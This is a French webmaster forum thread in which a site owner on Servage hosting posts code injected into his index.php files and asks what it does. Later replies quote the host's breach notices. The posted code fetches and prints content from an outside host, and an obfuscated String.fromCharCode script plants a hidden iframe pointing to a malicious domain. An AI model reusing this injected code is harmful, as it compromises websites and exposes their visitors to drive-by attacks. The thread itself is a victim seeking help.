Hacking, oui, mais lequel ?

WRInaute impliqué
Bonjour à tous,

sur mes sites (chez Servage) ces lignes ont été rajoutées dans les index.php :

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?1611");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?1611")); }
if($r) print $r;

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?1952");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?1952")); }
if($r) print $r;

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?403");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?403")); }
if($r) print $r;
?>
<script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,101,118,105,108,116,114,97,102,102,46,110,101,116,47,105,110,46,99,103,105,63,100,101,102,97,117,108,116,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,62,60,47,105,102,114,97,109,101,62));</script>

Je n'ai pas eu d'effets visibles à part un gros ralentissement du chargement -et donc effondrement des visites-
Pouvez-vous me dire ce que fait ce script ??

J'ai déja eu pas mal d'attaques de mes sites, mais uniquement chez Servage et pas les autres hebergeurs. Servage est-t-il plus fragile que d'autres , ou c'est moi qui m'y prend mal (mot de passe du compte , mdp du ftp ? ) ??

Merci d'avance

Alain
 
WRInaute impliqué
Bonjour,
Ca tente de télécharger plusieurs fichiers, et ca affiche un message

Rassures-nous,
tu as déjà trouvé la rustine pour boucher cette faille, ou as-tu au moins rapporté le problème à ton hébergeur.
 
WRInaute impliqué
Topsitemaker a dit:
Bonjour,
Ca tente de télécharger plusieurs fichiers, et ca affiche un message

Rassures-nous,
tu as déjà trouvé la rustine pour boucher cette faille, ou as-tu au moins rapporté le problème à ton hébergeur.

Merci,

Leur support technique était déja au courant.
C'est pas la première fois chez Servage que mes sites se font hacker. Et pas ceux hebergés ailleurs (simple hasard ?).



Il y en a-t-il ici qui pratiquent Servage comme hebergeur ?
 
WRInaute accro
alaincassis a dit:
Leur support technique était déja au courant.
C'est pas la première fois chez Servage que mes sites se font hacker. Et pas ceux hebergés ailleurs (simple hasard ?).
:twisted: certainement :arrow:
 
WRInaute impliqué
Ca a fait du bruit au Danemark, et Servage y répond d"une facon plus ...constructive qu'en France:


"Hej Bruno,
Thank you for opening the ticket. Unfortunately some Servage server were hacked on
May, 4th. Due to this index files were tainted with javascript-code. We have fixed
the security vulnerability and deleted the mentioned code. I'm glad to inform you
that your account is save again.

Med venlig hilsen,
Helge, Support
Servage Hosting"





C'est là (pour ceux qui comprennent le danois !!) :
http://php-fusion.dk/forum/viewthread.p ... rowstart=0
 
WRInaute discret
Je remonte un vieux post mais il reste d'actualité vue que je me suis fait défacé 200 sites sur servage.

Le hack à eu lieu le 17 par un certain NobodyCoder.

J'ai envoyer un message, il ont mis 36 hrs pour répondre ceci :

At Servage security is our highest priority and the last years we have taken dramatic measures to build the most secure hosting environment around.

Unfortunately we have however been affected by the Linux kernel vulnerability (CVE-2009-2692) for a 24 hour period. Due to our architecture this exploit did not compromise personal data and all customer records are safe.

After updating the kernel on our systems we scanned all customer accounts and found that your index was removed. Therefore we kindly ask you to check your webpage and reupload your index page if it is missing.

We sincerely apologize for this incident and will take measures to ensure to prevent such incidents in the future.


Best regards,
Your Servage Team,

+++++++++++++++++++++++++++++

Je leur est demander se qu'il comptais faire pour me dédommager.
Il m'offre un mois gratuit, sympa quand tu sait que je vient de payer 6 mois et que je compte pas laisser mes sites là bas.

Bon je retourne chez OVH vue que les nouvelles offres avec les serveur mysql sont là maitenant.
Est-ce que d'autre ont eu le même probleme ?
L'ideél serais un serveur dedier mais bon faut s'avoir le géré. ;)
 
Discussions similaires
Haut